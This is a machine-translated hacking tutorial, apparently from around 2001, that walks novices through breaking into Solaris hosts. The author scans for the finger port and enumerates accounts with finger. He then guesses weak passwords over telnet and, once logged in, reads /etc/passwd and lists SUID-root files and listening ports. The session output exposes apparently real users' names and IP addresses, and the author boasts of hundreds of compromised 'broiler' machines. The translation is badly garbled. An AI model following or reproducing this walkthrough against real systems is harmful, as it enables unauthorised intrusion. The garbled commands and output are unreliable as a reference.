UNIX intrusion process (1)
Author's preamble: I have said that I have to write a sunos invading tutorial before, but I haven't been written. It's going to do it. Today is a bit boring, write something. However, this is my last invading course. What does it mean in black to black? I think it is still a good article in writing some technical analysis. I hope that the novice will see my last invading tutorial, I can find some feelings. This is just a introductory tutorial written to novice, not a novice. *** Do not invade and destroy the domestic network *** Description: For some reason, all IPs involved in 192.168.0. * The following is the list of systems used: 192.168.0.1 Windows 2000 Advanced Server 192.168.0.2 Solaris 7 SPARC, GCC 192.168.0.3 Solaris 5.6 SPARC 192.168.0.4 SOLARIS 8 SPARC 192.168.0.0.20 Redhat 6.2 Note: Solaris is Sun OS, their conversion is: Solaris 8 = Sunos 5.8, Solaris 7 = SunOS 5.7, Solaris 2.6 = SunOS 5.6, Solaris 2.5 = SunOS 5.5 ... (The platform you use is preferably NT / Win2000 / Linux / Unix, here I use Win2000, 192.168.0.1) Agreement: "*** text ***)" is some instructions for this line command or information. The tools used are: superscan 3.0 http://www.cnhonker.com/tmp/superscan.zip securecrt 3.3 http://www.cnhonker.com/tmp/securecrt3.3.zip The other program code used in this To http://lsd-pl.net/ or http://www.hack.co.za lookup. The beginning of the invasion story I like to put the broiler on the desktop, and each reinstall system will always forget something on the desktop. I remember that there was a list of more than 500 pieces of broilers, sometimes I feel sad, I think it is very pity. M $ is really broken and evil, and once again reloading the system, I will lose a list again. Fortunately, this broiler is not much, but my GCC has to re-find, pitiful. If this is not the reinstalry system, it may not write this tutorial. Take some machines to find a few machines, no machine can use it. You have followed me to find it. Earthwork, to get the first account, the simplest is to use Finger. (In fact, the thick face is the easiest way. :)) What is the port of the screen segment, give you a presentation. SUPERSCAN 3.0 You can get the 3.0 version of my personality in http://www.cnhonker.com/tmp/superscan.zip. (PS: Some fortunately, I have a colleague with Xiao Yan, I got a special version of streamer. In the way, I also advertise for his streamer. I think the flow of light is the best tool. I remember myself in September last year. When I started to learn NT / win2000 attack, I often use stream to sweep the network segment. Some people say that lion = will only use the guys of the light, huh, I haven't used it for a long time, it is often used in the last year. some.
Now I feel very good about the new version of the streamer, there are many functions, and there are many features in it, especially the Finger detection and guess, it is very suitable for new hands, everyone may wish to try. The latest version of the streamer can be obtained in Xiaoyan's website: http://www.netxeyes.com Many people are interested in my personal situation, and here is also the way, I have a personal growth experience, I don't laugh. In fact, this is true: March 8, 2000, to Guangzhou internship, start online, start learning IE, use Email to send and receive letters; in April, a personal website is established, and it will only use Trojan; in May to learn SunOS system attacks At that time, the improvement permissions were still unless, but this month I found www.elong.com's email system bypass the serious vulnerability of the password verification; I returned to the school graduation in June; I started a full-time web design in Guangzhou in Guangzhou; August There is a certain understanding of the SunOS system attack; in September, I have changed my first win2000, and I have used it and tried to attack; I am full of online security work in October; in November, Linux, at the time. A variety of attack methods and various system attack methods; Established a Hongci League website in December. Go home in Spring Festival in January 2001; organized Japan in February; Slow March slowly lost interest in attack system; in April, considering a lot of things; May organize the US network counterattack war, after the end of Beijing; July boring odor One month; in July or a few big decisions will be made. Give you two sentences to you: "People must rely on themselves" "I am me". In fact, these two sentences are all my. ) I have sent a complaints and start our learning history. Oh, slow, the novice first look at the three UNIX intrusion tutorials written in a few months, and continue. Ready? Let us unveil the mysterious veil of Unix ... come on baby ... First day: It is difficult to wait until get off work. :( Open SuperScan 3.0, (the list file is not found, you can click the port settings, select the import, select the scanner..lst in this software directory, click Finish.) Enter the network segment you want to scan in the IP bar. It is recommended that each scan is within 10 C segments, select the "Show host response" in the scan type, if your network speed is slow, put "only the host" of the PING "also hooks, select" all ports "That single option, then enter the port start and end in the box, all of which are" 79 ", which is the port of finger, and finally" start "for scanning. After the scan is complete, click" Shear "to drop the 79-port The host list, click "Disperse" or "save" to store the result as a text file to analyze the scan results. We can usually see the following common host responses: 1. ... Line user host (s) idle location. No one logged on. 3. Login name Tty idle when .. 4. Other response messages or no content. Among them, we only find 2,3 machines. Now we start writing machines, Or use a stream light to detect Finger. Handmade is actually trick, but it is difficult to say clearly, here will use Finger 0 @ ip to find SunOS's weak machine.
The following IP is replaced with xxx.xxx.xxx.xxx. ------------------------------------------------ Test -------------------------------------------------- ------------ C: /> Finger 0@xxx.xxx.xxx.xxx [xxx.xxx.xxx.xxx] finger: 0: no such user. ------- ------------------------------------- -------------------------------------------------- ----- Failure, this system should be Linux, don't be discouraged, we continue to find. ------------------------------------------------ Test -------------------------------------------------- ------------ C: /> Finger 0@xxx.xxx.xxx.xxx [xxx.xxx.xxx.xxx] login name tty idle when it daemon ??? <. > bin ??? <....> SYS ??? <...> Jeffrey ??? PTS / 0203.66.149.11 daniel ??? 437
114cm.kcable.
Jamie ??? 0
203.66.162.68
POSTGRES ??? PTS / 2
203.66.162.80
nsadmin ??? 768
203.66.19.50 HO ??? 390
61.169.209.106
House18 ??? PTS / 1
203.66.250.1 Tong ??? PTS / 0
210.226. 42.69 jliu ??? PTS / 0
203.66.52.87 PTAI ??? <....> ------------------------------------- ------------ TEST ----------------------------------- ------------------------- We need this, :) Among them, the first column of Jeffrey, Daniel, Jamie, Postgres, etc. The username on the host, the other content is some user login information. Now let's test the password intensity of these accounts. (Everyone is best to use these users and some passwords to guess tools, but I will feel tired, but I used to especially like to guess: Test: Test Oracle: Oracle .... Guess code feel is not bad.) --- ---------------------------------------------- Test --- -------------------------------------------------- --------- C: /> Telnet XXX.XXX.XXX.XXX SunOS 5.6 (*** Target System is SunOS 5.6 is Solaris 2.6 ***) login: PTAI (*** Enter your username ***) Password: **** (*** Enter Password ***) login incorrect (*** login failed ***) login: Jliu Password: Login IncorRect $ login: Tong Password: Last login: Mon jul 2 13:21:55 from 210.226. 42.69 (*** This user is last logging in to the last login, IP ***) Sun Microsystems Inc. Sunos 5.6 Generic August 1997 you have mail. (*** hoho ~ landing success ** * $ Uname -a (*** View system version and patch information ***) SUNOS DEV01 5.6 Generic_105181-19 Sun4u SPARC SUNW, ULTRA-5_10 $ set (*** View Some System Variable Information ***) Home = / export / home / tong hz = 100 IFS = logname = tong mail = / var / mail / tong mailcheck = 600 Optind = 1 Path = / usr / bin: ps1 = $ ps2 => shell = / bin / sh term = ANSI TZ = Hongkong $ GCC GCC: NOT FOUND (*** is evil, no compiler, we continue to find other machines, etc. will come back to clean up.
***) $ telnet localhost (*** telnet, so as to discover IP issues when the user will log in next time ***) Trying 127.0.0.1 ... Connected to localhost. Escape character is '^]'. SunOS 5.6 login: tong Password: Last login:. Wed Jul 4 17:56:09 from 211.99.42.226 Sun Microsystems Inc. SunOS 5.6 Generic August 1997 You have mail $ exit connection closed by foreign host $ exit lost connection to the host. . C: /> ---------------------------------------------- --- Test --------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------- We continue to guess, after a few more time, don't find one. :) This host's IP is replaced by 192.168.0.2. ------------------------------------------------ Test -------------------------------------------------- ------------ C: /> finger 0@192.168.0.2 [192.168.0.2] Login name TTY IDLE WHEN WHEN DAEMON ??? <....> Bin ??? <. .....> DENNNIS ??? PTS / 5PCD209117.Netvig Oracle ??? PTS / 5
O2
QWork ??? <....>
Kenneth1 ??? PTS / 4
CM61-18-172-213. WING ??? PTS / 6 11 WED 18:02 Office Wilson ??? PTS / 11
203.66.200.90
Srini ??? 363
Office Eric ??? PTS / 8
Office render7 ??? 62
211.18.109.186 delex ??? <....> Render9 ??? 023
Office C: /> Telnet 192.168.0.2 Sunos 5.7 Login: Render9 Password: Login IncorRect Login: Delex Password: ******************************************** ***************************** # The jrun is now replaced by jserv # to restart the servlet server, please use rs.sh # However, as the jserv for rel. ****************************************************** $ W 6:19 PM Up 61 Day (s), 3:40, 3 Users, Load Average: 0.11, 0.07, 0.10 User Tty login @ idle jcpu pcpu what root console 4may0161days 2 2 / usl / dt / bin / sdt_shell -c? u root PTS / 4 FRI 4PM 5DAYS TAIL -F SYSLOG DELEX PTS / 7 6:19 PM w $ uname -a Sunos develop 5.7 generic_106541-14 Sun4u sparc sunw, Ultra-5_10 $ w 4:44 PM Up 62 day (s), 1:45, 3 Users, Load Average: 0.02, 0.02, 0.02 User Tty login @ iDLE JCPU PCPU What root console 4may0162days 2 2 / usl / dt / bin / sdt_shell -c? u root PTS / 4 FRI 4PM 6DAYS TAIL -F SYSLOG $ GCC GCC: No Input Files -------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------Hao ~ Finally found a SUNOS with a compiler. Now let's find out if you have any invaders in front. :)
------------------------------------------------ Test -------------------------------------------------- ------------ $ LS -AL TOTAL 14 Drwxrwr-x 2 Delex Staff 512 JUL 4 18:28. Drwxr-xr-x 35 root root 1024 May 7 10:46 .. -rw- R - r - 1 delex staff 144 May 2 10:46 .profile -rw ------- 1 root staff 320 JUL 4 18:52 .sh_history -rw-r - r - 1 delex staff 124 May 2 10:46 local.cshrc -rw-r - r - 1 delex staff 581 May 2 10:46 local.login -rw-r - r - r - 1 delex staff 562 May 2 10:46 local.profile $ CAT / etc / passwd (*** check / etc / passwd ***) root: x: 0: 1: Super-user: /: / sbin / sh daemon: x: 1: 1 :: /: bin: x: 2: 2 :: / usr / bin: sys: x: 3: 3 :: /: adm: x: 4: 4: admin: / var / adm: lp: x: 71: 8: Line Printer admin: / usr / spool / lp: uucp: x: 5: 5: uucp admin: / usr / lib / uucp: nuucp: x: 9: 9: uucp admin: / var / spool / uucppublic: / usr / limited / uucp / UUCICO LISTEN: X: 37: 4: NETWORK Admin: / USR / NET / NLS: NOBODY: X: 60001: 60001: NOBODY: /: NOACCESS: X: 60002: 60002: No Access User: /: Nobody4: x : 65534: 65534: Sunos 4.x Nobody: /: Dennis: x: 1005: 20 :: / Export / Home / Dennis: / bin / sh Oracle: x: 1001: 100 :: / export / home / oracle: / BIN / SH Render7: x: 9589: 101 :: / export / home / render7: / bin / sh delex: x: 1035: 20 :: / export / home / delex: / bin / sh ac1: x: 3000: 300 : Agent Client 1: / Bin / SH AC2: X: 3001: 300: Agent Client 2: / Export / Home / AC2: / BIN / SH RENDER9: X: 9591: 101 :: / EXPORT / home / render9: / bin / sh $ ls -al / (*** View if there is .rhosts and other files ***) Total 381 Drwxrwxrwx 35 root root 1024 Jun 29 16:52. drwxrwxrwx 35 root root 1024 jun 29 16:52 .. -rw ------- 1 root other 152 May 4 14:39.xauthority drwxrwr-x 4 root other 512 Feb 20 10:33 .cpan -rw ------- 1 Root root 1032 May 4 14:
39.CPR_CONFIG -RW-R - R - 1 Root Other 947 APR 14 2000 .desksetDefaults DRWXR-XR-X 15 Root Other 512 JUN 20 13:09 .dt -rwxr-XR-x 1 root other 5111 APR 13 2000 .dtprofile drwx ------ 5 Root Other 512 APR 14 2000 .fm drwxr-xr-x 2 Root Other 512 APR 13 2000.Hotjava DrwxR-XR-X 4 Root Other 512 Mar 14 17:42 .Netscape -RW ------- 1 Root Other 1024 DEC 8 2000.RND -RW-RW-R - 1 Nobody Staff 402 JUN 12 11:14. SVG DRWX ------ 2 Root Other 512 APR 13 2000. Wastebasket DRWX ------ 2 Root Other 512 APR 13 2000 Deadletters DRWX ------ 2 Root Other 512 APR 13 2000 Mail DrwxR-XR-X 2 Root Root 512 APR 13 2000 TT_DB Drwxrwxr-x 2 Moluk Other 512 DEC 25 2000 xyiznwsk lrwxrwxrwx 1 root root 9 APR 13 2000 bin -> ./usr/bin drwxr-xr-x 2 root nobody 512 JUN 20 13:19 CDROM -RW ------- 1 root Other 77 J UN 7 15:03 dead.Letter Drwxrwr-x 18 root sys 3584 May 4 14:39 Dev drwxrwr-x 4 root sys 512 APR 13 2000 Devices drwxr-xr-x 9 root root 512 JUN 12 14:47 Disk2 drwxr-xr -x 32 root sys 3584 JUL 4 18:53 etc DRWXRWXR-X 3 root sys 512 APR 13 2000 Export DR-XR-XR-X 1 root root 1 May 4 14:39 Home Drwxr-XR-X 9 root sys 512 DEC 20 2000 KERNEL LRWXRWXRWX 1 root root 9 APR 13 2000 LIB -> ./USR/LIB DRWX ------ 3 root root 8192 APR 13 2000 LOST
Found drwxrwxr-x 2 root sys 512 APR 13 2000 MNT DR-XR-XR-X 1 root root 1 May 4 14:39 Net -RW-RW-R - 1 Nobody Staff 13 Feb 20 16:53 Newsletteadminmail.Ost DRWX ------ 2 Root other 512 May 6 2000 NSMail Drwxrwr-x 7 root sys 512 APR 28 2000 OPT DRWXR-XR-x 12 root sys 512 APR 13 2000 Platform DR-XR-XR-X 192 root root 126912 JUL 4 19:00 Proc Drwxrwr-x 2 root sys 512 DEC 20 2000 SBIN DRWXRWXR-X 2 Root 10 512 Feb 15 14:50 Snap DRWXRWXRWT 7 SYS SYS 986 JUL 4 19:00 TMP DRWXRWR-x 29 Root Sys 1024 May 3 17 : 32 USR DRWXR-XR-X 26 root sys 512 JUN 12 14:49 VAR DR-XR-XR-X 6 root root 512 May 4 14:39 Vol DRWXR-XR-X 2 WING 10 512 NOV 6 2000 Web DR- XR-XR-X 1 root root 1 JUL 4 18:55 xfn $ find / -user root -perm -4000 -exec ls -al {} /; -RS - x - x 1 root bin 19564 s EP 1 1998 / USR / LIB / LP / BIN / NETPR-R-SR-XR-X 1 Root Bin 15260 OCT 6 1998 / USR / LIB / FS / UFS / Quota -R-SR-SR-X 1 root Tty 174352 NOV 6 1998 / USR / LIB / FS / UFS / UFSDUMP -R-SR-XR-X 1 root bin 856064 NOV 6 1998 / usr / lib / fs / ufs / ufsrestore --- S - X - X - X - X - X 1 ROOT BIN 4316 OCT 6 1998 / USR / LIB / PT_CHMOD -R-SR-XR-X 1 root bin 8576 OCT 6 1998 / usr / lib / utmp_update -rwsr-xr-x 1 Root ADM 5304 Sep 1 1998 / USR / LIB / ACCT / Accton -R-SR-XR-X 1 Root Bin 643464 Sep 1 1998 / usr / lib / sendmail .... (*** The result is too much here, mainly to find any other previous invaders .
***) ... $ ps -ef uid ppid c stime tty time cmd root 0 000 May 04? 0:01 Sched Root 1 0 0 May 04? 1:03 / etc / init - root 2 0 0 May 04? 0:01 Pageout root 3 0 1 May 04? 476: 33 fsflush root 225 1 0 May 04? 0:01 / usr / lib / utmpd root 115 1 0 May 04? 0:01 / usr / sbin / rpcbind root 299 1 0 May 04? 0:00 / usr / limited 52 1 0 May 04? 0:00 / usr / lib / devfsadm / devfseventd root 54 1 0 May 04? 0:00 / usr / lib / devfsadm / devfsadmd root 117 1 0 May 04? 0:00 / usr / sbin / keyserv root 239 1 0 May 04? 0:13 / usr / lib / inet / xntpd root 142 1 0 May 04? 0:11 / usr / sbin / inetd -s root 163 1 0 May 04? 2:50 /usr/sbin/in.named root 164 1 0 May 04? 0:01 / usr / lib / automountd daem 153 1 0 May 04? 0:00 / usr / lib / nfs / statd root 275 1 0 May 04? 0:01 / usr / lib / nfs / mountd root 152 1 0 May 04?
0:00 / usr / lib / NFS / LOCKD ... $ netstat -an | grep listen (*** is there is no suspicious port ***) * .111 *. * 0 0 0 0 Listen * .21 *. * 0 0 0 0 0 0 0 0 Listen * .514 *. * 0 0 0 0 Listen * .513 *. * 0 0 0 0 listen * .512 *. * 0 0 0 0 Listen * .540 *. * 0 0 0 0 LISTEN * .79 *. * 0 0 0 0 LISTEN * .37 *. * 0 0 0 0 LISTEN * .7 *. * 0 0 0 0 LISTEN * .9 *. * 0 0 0 0 Listen * .13 *. * 0 0 0 0 listen * .19 *. * 0 0 0 0 Listen .... ... (*** omitted a test to the port, see if there is a bind suid root shell port ***) ... $ CD / TMP $ ls -al Total 1314 Drwxrwxrwt 7 sys sys 986 JUL 4 19:00. Drwxrwrwx 35 root root 1024 jun 29 16:52 .. drwxrwxr-x 2 root root 176 May 4 14:39 .x11-pipe drwxrwr-x 2 root root 176 May 4 14:39 .X11-unix drwxrwrwx 2 root root 179 May 4 14:39 .pcmcia drwxrwxrwx 2 root other 181 jun 20 13:18.removable drwxrwrwt 2 root root 327 May 4 14:39.rpc_door -rtwxrwr-x 1 root other 614 May 8 11:17 enctest.class -rw ------- 1 root other 265936 May 4 14:40 dtdbcache_: